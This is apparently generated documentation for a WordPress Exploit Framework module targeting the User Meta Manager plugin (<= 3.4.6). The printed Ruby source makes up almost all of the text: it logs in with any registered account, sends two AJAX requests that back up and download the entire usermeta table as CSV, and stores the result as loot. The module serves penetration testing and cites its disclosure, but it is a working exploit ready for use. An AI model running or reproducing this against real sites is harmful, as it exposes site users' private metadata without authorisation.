class Wpxf::Auxiliary::UserMetaManagerInformationDisclosure
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 9 def initialize super update_info( name: 'User Meta Manager <= 3.4.6 Information Disclosure', desc: %( The User Meta Manager plugin up to and including v3.4.6, suffers from an information disclosure vulnerability. Any registered user can perform a series of AJAX requests, in order to get all the contents of the `usermeta` table. ), author: [ 'Panagiotis Vagenas', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8384'], ['URL', 'http://seclists.org/bugtraq/2016/Feb/48'] ], date: 'Feb 01 2016' ) register_options([ StringOption.new( name: 'username', desc: 'The WordPress username to authenticate with', required: true ), StringOption.new( name: 'password', desc: 'The WordPress password to authenticate with', required: true ) ]) end
Public Instance Methods
backup_table(cookie)
click to toggle source
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 57 def backup_table(cookie) execute_get_request( url: wordpress_url_admin_ajax, cookie: cookie, params: { 'action' => 'umm_switch_action', 'umm_sub_action' => 'umm_backup' } ) end
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 53 def check check_plugin_version_from_readme('user-meta-manager', '3.4.7') end
download_backup(cookie)
click to toggle source
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 68 def download_backup(cookie) execute_get_request( url: wordpress_url_admin_ajax, cookie: cookie, params: { 'action' => 'umm_switch_action', 'umm_sub_action' => 'umm_get_csv' } ) end
password()
click to toggle source
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 49 def password datastore['password'] end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 79 def run return false unless super cookie = authenticate_with_wordpress(username, password) return false unless cookie emit_info 'Creating table backup...' backup_table(cookie) emit_info 'Downloading table backup...' res = download_backup(cookie) loot = export_and_log_loot res.body, 'Backup of the usermeta table', 'backup', '.csv' emit_success "Downloaded backup to #{loot.path}" true end
username()
click to toggle source
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 45 def username datastore['username'] end